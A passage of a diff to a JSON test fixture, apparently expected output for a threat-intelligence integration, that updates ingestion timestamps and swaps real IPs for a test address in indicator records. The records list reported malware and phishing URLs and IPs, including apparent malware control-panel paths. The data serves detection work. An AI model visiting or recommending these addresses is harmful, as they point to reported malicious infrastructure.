'http://5.188.60.23/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.676Z\"}", + "ingested": "2021-12-13T08:38:40.023948Z", + "original": "{\"created\":\"2020-02-01T02:04:21.676Z\",\"description\":\"TS ID: 55277443202; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--1f9e0571-119c-448a-8656-fec49c9c058a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:04:21.676Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.676Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12201,7 +12201,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386178006Z", + "ingested": "2021-12-13T08:38:40.023951500Z", "original": "{\"created\":\"2020-02-01T02:04:21.705Z\",\"description\":\"TS ID: 55277443078; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--d1161e31-f661-469c-b206-84e1d416e577\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-01T02:04:21.705Z\",\"name\":\"mal_url: http://gosdick.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gosdick.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.705Z\"}", "category": "threat", "type": "indicator", @@ -12220,7 +12220,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 185.22.155.46", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55277442685; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime", "modified": "2020-02-01T02:04:21.745Z", "valid_from": "2020-02-01T02:04:21.745Z", @@ -12242,12 +12242,12 @@ "first_seen": "2020-02-01T02:04:21.745Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "185.22.155.46" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386182444Z", - "original": "{\"created\":\"2020-02-01T02:04:21.745Z\",\"description\":\"TS ID: 55277442685; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--8f0a9931-5ee4-4b0e-b473-b130d72ef175\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-17\"],\"modified\":\"2020-02-01T02:04:21.745Z\",\"name\":\"mal_ip: 185.22.155.46\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '185.22.155.46']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.745Z\"}", + "ingested": "2021-12-13T08:38:40.023956800Z", + "original": "{\"created\":\"2020-02-01T02:04:21.745Z\",\"description\":\"TS ID: 55277442685; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime\",\"id\":\"indicator--8f0a9931-5ee4-4b0e-b473-b130d72ef175\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-17\"],\"modified\":\"2020-02-01T02:04:21.745Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:04:21.745Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12298,7 +12298,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386186692Z", + "ingested": "2021-12-13T08:38:40.023963Z", "original": "{\"created\":\"2020-02-01T02:05:07.232Z\",\"description\":\"TS ID: 55277443523; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--0068cb9c-0bdf-44a8-9563-5006e0c38921\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-01T02:05:07.232Z\",\"name\":\"mal_url: http://everest--sh.com/click/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://everest--sh.com/click/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:05:07.232Z\"}", "category": "threat", "type": "indicator", @@ -12317,7 +12317,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://92.63.197.156/tspir/index.php", + "name": "mal_url: http://89.160.20.156/tspir/index.php", "description": "TS ID: 55277442283; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime", "modified": "2020-02-01T02:05:07.274Z", "valid_from": "2020-02-01T02:05:07.274Z", @@ -12342,16 +12342,16 @@ "url": { "path": "/tspir/index.php", "extension": "php", - "original": "http://92.63.197.156/tspir/index.php", + "original": "http://89.160.20.156/tspir/index.php", "scheme": "http", - "domain": "92.63.197.156", - "full": "http://92.63.197.156/tspir/index.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/tspir/index.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386191341Z", - "original": "{\"created\":\"2020-02-01T02:05:07.274Z\",\"description\":\"TS ID: 55277442283; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--2dd49cbe-4835-49ea-a29c-b173c0840506\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-01T02:05:07.274Z\",\"name\":\"mal_url: http://92.63.197.156/tspir/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://92.63.197.156/tspir/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:05:07.274Z\"}", + "ingested": "2021-12-13T08:38:40.023969300Z", + "original": "{\"created\":\"2020-02-01T02:05:07.274Z\",\"description\":\"TS ID: 55277442283; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--2dd49cbe-4835-49ea-a29c-b173c0840506\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-02-01T02:05:07.274Z\",\"name\":\"mal_url: http://89.160.20.156/tspir/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/tspir/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:05:07.274Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12402,7 +12402,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386195829Z", + "ingested": "2021-12-13T08:38:40.023975100Z", "original": "{\"created\":\"2020-02-01T02:06:07.042Z\",\"description\":\"TS ID: 55277443220; iType: mal_url; State: active; Org: OVH Hosting; Source: CyberCrime\",\"id\":\"indicator--b8e709b0-7eb8-4b2b-94f0-e21c4138cf9b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:06:07.042Z\",\"name\":\"mal_url: http://vware.duckdns.org/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://vware.duckdns.org/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:07.042Z\"}", "category": "threat", "type": "indicator", @@ -12454,7 +12454,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386200548Z", + "ingested": "2021-12-13T08:38:40.023981700Z", "original": "{\"created\":\"2020-02-01T02:06:15.505Z\",\"description\":\"TS ID: 55277443605; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--10e62d11-dbc5-4d39-badf-574aaab2d0f5\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-02-01T02:06:15.505Z\",\"name\":\"mal_url: http://cokhiquangbien.com/.jx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://cokhiquangbien.com/.jx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:15.505Z\"}", "category": "threat", "type": "indicator", @@ -12506,7 +12506,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386204826Z", + "ingested": "2021-12-13T08:38:40.023989100Z", "original": "{\"created\":\"2020-02-01T02:06:15.674Z\",\"description\":\"TS ID: 55277443276; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--a84ddb39-c02c-44cc-bac3-0056c279454c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:06:15.674Z\",\"name\":\"mal_url: http://corpcougar.com/nedu/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://corpcougar.com/nedu/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:15.674Z\"}", "category": "threat", "type": "indicator", @@ -12557,7 +12557,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386209154Z", + "ingested": "2021-12-13T08:38:40.023996300Z", "original": "{\"created\":\"2020-02-01T02:06:38.684Z\",\"description\":\"TS ID: 55277443190; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--f667d2dd-f6df-4aa4-bd7b-8b7f3e98fa0a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-02-01T02:06:38.684Z\",\"name\":\"mal_url: http://bubble2.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://bubble2.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:38.684Z\"}", "category": "threat", "type": "indicator", @@ -12609,7 +12609,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386213492Z", + "ingested": "2021-12-13T08:38:40.024003700Z", "original": "{\"created\":\"2020-02-01T02:06:38.733Z\",\"description\":\"TS ID: 55277442690; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--a81a2408-b11b-4b28-a5b6-ffec11942d62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-32\"],\"modified\":\"2020-02-01T02:06:38.733Z\",\"name\":\"mal_url: http://144.202.96.212/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://144.202.96.212/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:38.733Z\"}", "category": "threat", "type": "indicator", @@ -12661,7 +12661,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386217991Z", + "ingested": "2021-12-13T08:38:40.024011Z", "original": "{\"created\":\"2020-02-01T02:06:49.292Z\",\"description\":\"TS ID: 55277443216; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--4a414cbe-3e02-48b9-84fb-103ed9961e6c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-75\"],\"modified\":\"2020-02-01T02:06:49.292Z\",\"name\":\"mal_url: http://papafrog.beget.tech/index.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://papafrog.beget.tech/index.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:06:49.292Z\"}", "category": "threat", "type": "indicator", @@ -12712,7 +12712,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386222349Z", + "ingested": "2021-12-13T08:38:40.024018300Z", "original": "{\"created\":\"2020-02-01T02:07:27.633Z\",\"description\":\"TS ID: 55277443028; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--27f66dbf-4ce9-4616-aef1-c6ab9f224ecb\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:07:27.633Z\",\"name\":\"mal_url: http://t917659s.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://t917659s.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:07:27.633Z\"}", "category": "threat", "type": "indicator", @@ -12731,7 +12731,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://185.136.159.206/login", + "name": "mal_url: http://89.160.20.156/login", "description": "TS ID: 55277443145; iType: mal_url; State: active; Org: Host Europe GmbH; Source: CyberCrime", "modified": "2020-02-01T02:07:36.513Z", "valid_from": "2020-02-01T02:07:36.513Z", @@ -12755,16 +12755,16 @@ "provider": "CyberCrime", "url": { "path": "/login", - "original": "http://185.136.159.206/login", + "original": "http://89.160.20.156/login", "scheme": "http", - "domain": "185.136.159.206", - "full": "http://185.136.159.206/login" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/login" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386226927Z", - "original": "{\"created\":\"2020-02-01T02:07:36.513Z\",\"description\":\"TS ID: 55277443145; iType: mal_url; State: active; Org: Host Europe GmbH; Source: CyberCrime\",\"id\":\"indicator--4cd504ee-3b5e-439f-b37d-3e932b200a55\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-01T02:07:36.513Z\",\"name\":\"mal_url: http://185.136.159.206/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://185.136.159.206/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:07:36.513Z\"}", + "ingested": "2021-12-13T08:38:40.024025500Z", + "original": "{\"created\":\"2020-02-01T02:07:36.513Z\",\"description\":\"TS ID: 55277443145; iType: mal_url; State: active; Org: Host Europe GmbH; Source: CyberCrime\",\"id\":\"indicator--4cd504ee-3b5e-439f-b37d-3e932b200a55\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-72\"],\"modified\":\"2020-02-01T02:07:36.513Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:07:36.513Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12815,7 +12815,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386240623Z", + "ingested": "2021-12-13T08:38:40.024032700Z", "original": "{\"created\":\"2020-02-01T02:08:09.833Z\",\"description\":\"TS ID: 55277443560; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--7d803ca2-4e7d-414e-9693-854d08c49bb6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-01T02:08:09.833Z\",\"name\":\"mal_url: http://drop-box.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://drop-box.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:09.833Z\"}", "category": "threat", "type": "indicator", @@ -12834,7 +12834,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://94.177.123.112/xcool!/admin.php", + "name": "mal_url: http://89.160.20.156/xcool!/admin.php", "description": "TS ID: 55277442673; iType: mal_url; State: active; Org: Mir Telematiki Ltd; Source: CyberCrime", "modified": "2020-02-01T02:08:09.939Z", "valid_from": "2020-02-01T02:08:09.939Z", @@ -12859,16 +12859,16 @@ "url": { "path": "/xcool!/admin.php", "extension": "php", - "original": "http://94.177.123.112/xcool!/admin.php", + "original": "http://89.160.20.156/xcool!/admin.php", "scheme": "http", - "domain": "94.177.123.112", - "full": "http://94.177.123.112/xcool!/admin.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/xcool!/admin.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386248578Z", - "original": "{\"created\":\"2020-02-01T02:08:09.939Z\",\"description\":\"TS ID: 55277442673; iType: mal_url; State: active; Org: Mir Telematiki Ltd; Source: CyberCrime\",\"id\":\"indicator--7cbc0a23-df38-4526-84b1-b344948f0b72\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-01T02:08:09.939Z\",\"name\":\"mal_url: http://94.177.123.112/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://94.177.123.112/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:09.939Z\"}", + "ingested": "2021-12-13T08:38:40.024040100Z", + "original": "{\"created\":\"2020-02-01T02:08:09.939Z\",\"description\":\"TS ID: 55277442673; iType: mal_url; State: active; Org: Mir Telematiki Ltd; Source: CyberCrime\",\"id\":\"indicator--7cbc0a23-df38-4526-84b1-b344948f0b72\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-63\"],\"modified\":\"2020-02-01T02:08:09.939Z\",\"name\":\"mal_url: http://89.160.20.156/xcool!/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/xcool!/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:09.939Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12886,7 +12886,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 47.241.1.46", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55277443138; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime", "modified": "2020-02-01T02:08:31.777Z", "valid_from": "2020-02-01T02:08:31.777Z", @@ -12908,12 +12908,12 @@ "first_seen": "2020-02-01T02:08:31.777Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "47.241.1.46" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386254269Z", - "original": "{\"created\":\"2020-02-01T02:08:31.777Z\",\"description\":\"TS ID: 55277443138; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--9530c9fb-99b6-40af-b14a-a622cff510b1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:08:31.777Z\",\"name\":\"mal_ip: 47.241.1.46\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '47.241.1.46']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:31.777Z\"}", + "ingested": "2021-12-13T08:38:40.024047200Z", + "original": "{\"created\":\"2020-02-01T02:08:31.777Z\",\"description\":\"TS ID: 55277443138; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--9530c9fb-99b6-40af-b14a-a622cff510b1\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:08:31.777Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:31.777Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12931,7 +12931,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 95.163.212.79", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55277442273; iType: mal_ip; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime", "modified": "2020-02-01T02:08:31.818Z", "valid_from": "2020-02-01T02:08:31.818Z", @@ -12953,12 +12953,12 @@ "first_seen": "2020-02-01T02:08:31.818Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "95.163.212.79" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386259999Z", - "original": "{\"created\":\"2020-02-01T02:08:31.818Z\",\"description\":\"TS ID: 55277442273; iType: mal_ip; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--6955fd8f-b856-43aa-bac7-0d5a2d8519f2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:08:31.818Z\",\"name\":\"mal_ip: 95.163.212.79\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '95.163.212.79']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:31.818Z\"}", + "ingested": "2021-12-13T08:38:40.024051300Z", + "original": "{\"created\":\"2020-02-01T02:08:31.818Z\",\"description\":\"TS ID: 55277442273; iType: mal_ip; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--6955fd8f-b856-43aa-bac7-0d5a2d8519f2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:08:31.818Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:31.818Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -13009,7 +13009,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386265219Z", + "ingested": "2021-12-13T08:38:40.024056600Z", "original": "{\"created\":\"2020-02-01T02:08:42.76Z\",\"description\":\"TS ID: 55277443599; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--4c8f8d86-da50-48bb-a41b-8a002561315a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-02-01T02:08:42.76Z\",\"name\":\"mal_url: http://digi-sec.top/lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://digi-sec.top/lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:08:42.76Z\"}", "category": "threat", "type": "indicator", @@ -13061,7 +13061,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386269778Z", + "ingested": "2021-12-13T08:38:40.024061900Z", "original": "{\"created\":\"2020-02-01T02:09:05.295Z\",\"description\":\"TS ID: 55277443514; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--3639e6da-8159-4dd6-b928-b8189c29159f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-01T02:09:05.295Z\",\"name\":\"mal_url: http://everest--sh.com/cola/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://everest--sh.com/cola/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:05.295Z\"}", "category": "threat", "type": "indicator", @@ -13112,7 +13112,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386274296Z", + "ingested": "2021-12-13T08:38:40.024067600Z", "original": "{\"created\":\"2020-02-01T02:09:13.398Z\",\"description\":\"TS ID: 55277443134; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--7d4bf98b-8fc2-427c-a08b-f432e43c1110\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-01T02:09:13.398Z\",\"name\":\"mal_url: http://moonberry.pk/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://moonberry.pk/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:13.398Z\"}", "category": "threat", "type": "indicator", @@ -13164,7 +13164,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386295396Z", + "ingested": "2021-12-13T08:38:40.024071500Z", "original": "{\"created\":\"2020-02-01T02:09:49.804Z\",\"description\":\"TS ID: 55277442688; iType: mal_url; State: active; Org: Choopa, LLC; Source: CyberCrime\",\"id\":\"indicator--0f2bf75c-d534-48e9-a25f-940cc5f673ed\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-01T02:09:49.804Z\",\"name\":\"mal_url: http://207.246.67.4/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://207.246.67.4/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:49.804Z\"}", "category": "threat", "type": "indicator", @@ -13216,7 +13216,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386302730Z", + "ingested": "2021-12-13T08:38:40.024077200Z", "original": "{\"created\":\"2020-02-01T02:09:56.524Z\",\"description\":\"TS ID: 55277443239; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--0cdef192-7b00-48b1-b8d4-a9642e37d630\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:09:56.524Z\",\"name\":\"mal_url: http://farzanatradings.com/odogwu/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farzanatradings.com/odogwu/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:09:56.524Z\"}", "category": "threat", "type": "indicator", @@ -13268,7 +13268,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386308290Z", + "ingested": "2021-12-13T08:38:40.024081400Z", "original": "{\"created\":\"2020-02-01T02:10:00.889Z\",\"description\":\"TS ID: 55277443489; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--e409b749-d733-4b69-83cf-4df74ac8fd2b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:10:00.889Z\",\"name\":\"mal_url: http://gpi-q.com/clean/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/clean/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:10:00.889Z\"}", "category": "threat", "type": "indicator", @@ -13320,7 +13320,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386313009Z", + "ingested": "2021-12-13T08:38:40.024085900Z", "original": "{\"created\":\"2020-02-01T02:10:04.196Z\",\"description\":\"TS ID: 55277443402; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--347a1f39-78c4-4f71-b125-decaba2489b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-01T02:10:04.196Z\",\"name\":\"mal_url: http://trouserlanditd.com/drug/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 